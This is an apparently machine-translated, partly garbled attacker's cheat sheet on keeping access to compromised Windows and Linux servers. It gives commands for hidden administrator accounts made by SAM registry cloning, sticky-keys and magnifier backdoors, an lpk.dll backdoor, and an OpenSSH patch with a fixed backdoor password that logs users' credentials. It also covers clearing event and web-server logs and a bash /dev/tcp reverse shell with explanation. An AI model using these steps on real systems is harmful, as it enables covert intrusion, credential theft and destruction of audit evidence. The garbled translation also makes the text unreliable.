windows
-
User accounts back door
NET the User
NET the User AA / the Add
NET localgroup of the Administrators A / the Add
My Computer - Manage - local user groups, right-click the user created after setting a password
to open the registry regedit, select SAM, everyone permission to add a complete control
looking at an administrator's name, and the corresponding type names 0x1f4,
and then find the binary value of the administrator, select all copy
the same operation, find the user-created, the administrator of the binary value attached to create their own
Finally, the set of everyone permission to delete
net user guest /active:yes
net user guest 123.com
net localgroup administrators guest /add
Hide account:
move support_388945a0 the user
computer - management - user - password support_388945a0
right click Properties - Dial - allows remote accessMy Computer - Manage - local users group, created after the user's password right-click
to open the registry regedit, select SAM, everyone permission to add a complete control
to find the name of the Administrator, as well as the corresponding type names 0x1f4,
to find binary value administrator, the name for the f table Select All to copy
the same operation, find support_388945a0, the administrator of the binary value attached to support_388945a0
Finally, delete everyone permission settingsMy computer - Properties - open the Remote Desktop
-
lpk back door
after creating a user
using the lpk generate a file lpk.dll
then lpk.dll system32 files to the target server among
the 3389 target on the connection page, press five times to bring up the adhesive shift key
and then press the button to set a good, enter the password to start the program -
Trojan backdoor
dream era
Clear signs - Computer - Manage
Event Viewer - Security - right click Clear All Events
iis Manager - Access Web Site Properties - Logging Properties
Log File Properties - My Computer to open, compared to remove access to records
linux
-
Backdoor
two tools to decompress after uploaded
tar zxvf OpenSSH 5.9p 1.tar.gz-
tar zxvf 0x06-OpenSSH 5.9p 1.patch.tar.gz-
cd-5.9p1.path OpenSSH /
cp sshbd5.9p1.diff ... / OpenSSH-5.9p1
CD ... / 5.9p1 OpenSSH-
Patch <backdoor path // sshbd5.9p1.diffvi includes.h // modify backdoor password, log file location
/ *
+ # the DEFINE ILOG "/ tmp / ILOG /" // log on to the machine records the user name and password
+ # define OLOG "/ tmp / olog" // Record Log on to the remote user name and password
+ # define SECRETPW "123456" // backdoor password
* /yum install -y openssl openssl-devel pam-devel
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5// If you have problems installing zlib
// yum -y install zlib zlib -develthe make install && the make
Service // restart sshd restart sshd
landing ssh
Clear traces
var / log / the httpd / access_log
etc / the httpd / Loga / access_log
直接修改文件,将ip 访问的网站全部改掉
vim var/log/httpd/access_log
Source package
asp 源码打包生成HSH.mdb
在木马的同一级目录下访问HSH.mdb,进行下载
在本地访问用于打包的马进行解包
php源码打包 nosafe.php马 在根目录下最下方有全选
然后选择压缩
Tuoku:
Data Management - off Cooma
Rebound shell.
echo “bash -i >& /dev/tcp/192.168.31.237/4444 0>&1” | bash
bash -i: bash is a common Linux shell, -i parameter indicates generate an interactive shell
/dev/tcp/192.168.175.134/8080: / dev / tcp | udp / ip / port is a special Linux in a file, if the access on Linux will find this file does not exist, its meaning is to host and establish a target host ip tcp or udp port connection on port
0> & 1: 0 standard input standard output 1 to output redirection. Or may be understood, the standard input and standard output 0 1 combined, to redirect 1, because 1 has already been redirected to the standard output /dev/tcp/192.168.175.134/8080, so now the standard input and standard output 0 1 point /dev/tcp/192.168.175.134/8080.
echo + | bash is the intermediate conduit having an interactive shell by imparting bash
shift back door
will be C: \ WINDOWS \ system32 \ dllcache \ sethc.exe delete this folder placed the cache, if not deleted automatically change back.
Delete the C: \ sethc.exe file WINDOWS \ system32 \ under.
Rename the C: \ cmd.exe WINDOWS \ system32 \ under is sethc.exe.
Press the 5 DOS window to pop up the next shift administrative privileges.
Magnifying glass back door
Creating magnify.bat
@echo off
net user administrator$ woaijiushi /add
net localgroup administrators hack$ /add
%Windir%\system32\nagnify.exe
exit
Bat2com using other tools to convert the file into exe Bat file
generated magnify.exe respectively replace C: \ WINDOWS \ system32 \ magnify.exe C and under dllcache: \ WINDOWS \ system32 magnify.exe under \
By calling + U key combination Win landing.
